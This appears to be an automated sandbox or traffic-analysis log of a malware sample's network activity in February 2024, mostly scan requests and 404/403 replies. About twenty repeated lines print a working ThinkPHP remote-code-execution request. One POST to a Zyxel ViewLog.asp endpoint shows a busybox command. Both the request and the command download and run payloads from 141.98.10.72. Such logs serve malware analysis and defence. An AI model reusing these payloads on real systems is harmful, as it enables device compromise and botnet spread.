Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0

Source: unknown

DNS traffic detected: queries for: daisy.ubuntu.com

Source: unknown

HTTP traffic detected: POST /cgi-bin/ViewLog.asp HTTP/1.1Host: 192.168.0.14:80Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: python-requests/2.20.0Content-Length: 227Content-Type: application/x-www-form-urlencodedData Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: Apache-Coyote/1.1Content-Type: text/html;charset=utf-8Content-Language: enContent-Length: 1050Date: Wed, 14 Feb 2024 08:28:47 GMT
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 14 Feb 2024 08:29:00 GMTServer: Apache/2.4.38 (Win64) OpenSSL/1.1.1b PHP/7.3.3Vary: accept-language,accept-charsetContent-Length: 438Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 31 2e 31 2e 31 62 20 50 48 50 2f 37 2e 33 2e 33 20 53 65 72 76 65 72 20 61 74 20 31 39 32 2e 31 36 38 2e 30 2e 31 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /cgi-bin/ViewLog.asp was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.38 (Win64) OpenSSL/1.1.1b PHP/7.3.3 Server at 192.168.0.14 Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 14 Feb 2024 08:29:01 GMTServer: ApacheVary: Accept-EncodingContent-Encoding: gzipContent-Length: 181Keep-Alive: timeout=15, max=300Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8e 4b 0f 82 30 10 84 ef fc 8a 95 bb 2c 1a 8e 4d 0f f2 88 24 88 c4 94 83 47 4c d7 94 04 69 a5 c5 c7 bf 97 c7 c5 e3 ec cc 37 b3 6c 93 9c 63 71 ad 52 38 8a 53 01 55 7d 28 f2 18 fc 2d 62 9e 8a 0c 31 11 c9 ea ec 83 10 31 2d 7d ee 31 e5 1e 1d 67 8a 1a 39 09 d7 ba 8e 78 14 46 50 6a 07 99 1e 7b c9 70 3d 7a 0c 97 10 bb 69 f9 9d b9 1d ff cb 4c ca 63 86 0b 45 30 d0 73 24 eb 48 42 7d 29 00 db 5e d2 27 30 ca c0 bb b1 d0 4f c8 7d 46 40 f7 e0 54 6b c1 d2 f0 a2 21 60 68 e6 89 a5 7c aa 9b 9f f2 7e 74 46 9f df cf 00 00 00 Data Ascii: MK0,M$GLi7lcqR8SU}(-b11-}1g9xFPj{p=ziLcE0s$HB})^'0O}F@Tk!`h\|~tF
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 0X-NWS-LOG-UUID: 14817034343562233346Connection: closeServer: Lego ServerDate: Wed, 14 Feb 2024 08:29:04 GMTX-Cache-Lookup: Return Directly
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 14 Feb 2024 08:29:05 GMTContent-Length: 0Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 0X-NWS-LOG-UUID: 8051582542529074328Connection: closeServer: Lego ServerDate: Wed, 14 Feb 2024 08:29:05 GMTX-Cache-Lookup: Return Directly
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeTransfer-Encoding: chunked
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 14 Feb 2024 10:26:52 GMTServer: WebsX-Frame-Options: SAMEORIGINCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 14 Feb 2024 08:29:14 GMTConnection: Close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 14 Feb 2024 08:29:16 GMTContent-Length: 0Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 Forbidden
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Connection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 14 Feb 2024 08:21:19 GMTServer: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8o PHP/5.3.8-ZS5.5.0Content-Length: 217Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /cgi-bin/ViewLog.asp was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 14 Feb 2024 08:29:23 GMTServer: webX-Frame-Options: SAMEORIGINCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 14 Feb 2024 08:29:30 GMTContent-Type: text/htmlContent-Length: 150Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnlyConnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeServer: TESTDate: Wed, 14 Feb 2024 08:29:35 GMTContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 6c 6f 6f 73 65 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0d 0a 3c 74 69 74 6c 65 3e 5a 69 65 68 65 72 31 37 38 31 41 57 20 2d 20 45 72 72 6f 72 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 3e 0d 0a 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 6c 6f 67 69 6e 2e 63 73 73 22 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 20 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0d 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 61 6e 63 6f 6d 2d 73 79 73 74 65 6d 73 2e 64 65 22 3e 3c 69 6d 67 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 69 6d 67 22 20 73 72 63 3d 22 2f 69 6d 61 67 65 73 2f 70 72 6f 64 75 63 74 73 76 67 2e 73 76 67 22 20 61 6c 74 3d 22 4c 41 4e 43 4f 4d 20 53 79 73 74 65 6d 73 20 48 6f 6d 65 70 61 67 65 22 3e 3c 2f 61 3e 3c 70 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 70 22 3e 4c 41 4e 43 4f 4d 20 31 37 38 31 41 57 3c 2f 70 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 6f 67 69 6e 63 6f 6e 74 65 6e 74 20 64 75 6c 6c 45 72 72 6f 72 22 3e 0d 0a 3c 68 32 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 59 6f 75 20 61 73 6b 65 64 20 66 6f 72 20 61 20 55 52 4c 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 3c 2f 70 3e 0d 0a 3c 66 6f 72 6d 20 6d 65 74 68 6f 64 3d 22 50 4f 53 54 22 20 61 63 74 69 6f 6e 3d 22 2f 22 20 3e 0d 0a 3c 64 69 76 3e 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 20 63 6c 61 73 73 3d 22 6d 61 69 6e 50 61 67 65 4c 69 6e 6b 22 20 61 63 63 65 73 73 6b 65 79 3d 22 62 22 20 6f 6e 63 6c 69 63 6b 3d 22 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 27 2f 27 22 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 26 71 75 6f 74 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 26 71 75 6f 74 3b 3e 42 3c 2f 73 70 61 6e 3e 61 63 6b 20 74 6f 20 4d 61 69 6e 2d 50 61 67 65 3c 2f 62 75 74 74 6f 6e 3e 3c 2f 64 69 76 3e 0d 0a 3c 2f 66 6f 72 6d 3e 0d 0a 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 3c 2f
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 14 Feb 2024 08:29:40 GMTServer: ApacheContent-Length: 338Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /cgi-bin/ViewLog.asp was not found on this server.</p><p>Additionally, a 400 Bad Requesterror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 14 Feb 2024 08:45:42 GMTServer: Apache/2.4.6 (CentOS)Content-Length: 217Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /cgi-bin/ViewLog.asp was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundCache-control:no-cache
